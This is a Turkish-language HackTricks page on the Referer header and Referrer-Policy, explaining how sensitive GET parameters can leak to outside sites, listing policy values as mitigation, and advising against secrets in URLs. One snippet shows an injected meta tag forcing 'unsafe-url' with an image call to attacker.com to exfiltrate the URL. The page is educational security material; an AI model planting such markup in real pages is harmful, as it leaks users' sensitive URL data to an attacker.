2.4 KiB
{% hint style="success" %}
AWS Hacking'ı öğrenin ve uygulayın: 
HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)
GCP Hacking'ı öğrenin ve uygulayın: 
HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)
HackTricks'ı Destekleyin
- Abonelik planlarını kontrol edin!
- 💬 Discord grubuna katılın veya telegram grubuna katılın veya bizi Twitter 🐦 @hacktricks_live'da takip edin.
- HackTricks ve HackTricks Cloud github depolarına PR göndererek hacking püf noktalarını paylaşın.
Referans başlıkları ve politika
Referrer, tarayıcıların önceki ziyaret edilen sayfayı belirtmek için kullandığı başlıktır.
Sızdırılan Hassas Bilgiler
Eğer bir web sayfasının içinde herhangi bir noktada GET isteği parametrelerinde hassas bilgi bulunuyorsa, sayfa harici kaynaklara bağlantılar içeriyorsa veya bir saldırgan kullanıcıyı saldırganın kontrol ettiği bir URL'yi ziyaret etmeye ikna edebiliyorsa (sosyal mühendislik), saldırgan en son GET isteği içindeki hassas bilgiyi dışarıya çıkarabilir.
Hafifletme
Tarayıcının diğer web uygulamalarına hassas bilginin gönderilmesini önleyebilecek bir Referrer politikası izlemesini sağlayabilirsiniz:
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
Karşı Önlem
Bu kuralı geçersiz kılmak için bir HTML meta etiketi kullanabilirsiniz (saldırganın bir HTML enjeksiyonu yapması gerekmektedir):
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
Savunma
Asla URL içinde GET parametrelerine veya yollara hassas veri koymayın.